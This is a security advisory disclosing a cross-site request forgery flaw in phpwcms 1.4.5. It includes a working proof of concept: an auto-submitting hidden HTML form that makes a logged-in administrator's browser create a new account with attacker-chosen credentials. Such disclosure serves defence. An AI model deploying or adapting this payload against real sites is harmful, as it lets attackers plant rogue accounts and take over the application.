[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

XSRF (CSRF) in phpwcms



Vulnerability ID: HTB22476
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_phpwcms.html
Product: phpwcms 
Vendor: Oliver Georgi ( http://www.phpwcms.de/ ) 
Vulnerable Version: 1.4.5 and Probably Prior Versions
Vendor Notification: 01 July 2010 
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "phpwcms.php" script to properly verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

Attacker can use browser to exploit this vulnerability. The following PoC is available:


<form action="http://host/phpwcms.php?do=admin&s=1"; name="m" method="POST">
<input type="hidden" name="form_newloginname" value="aaa">
<input type="hidden" name="form_newpassword" value="aaa">
<input type="hidden" name="form_newemail" value="aaa@xxxxxxxxxxx">
<input type="hidden" name="form_newrealname" value="">
<input type="hidden" name="form_feuser" value="2">
<input type="hidden" name="form_active" value="1">
<input type="hidden" name="verification_email" value="1">
<input type="hidden" name="form_aktion" value="create_account">
<input type="hidden" name="Submit" value="send+user+data">
</form>
<script>
document.m.submit();
</script>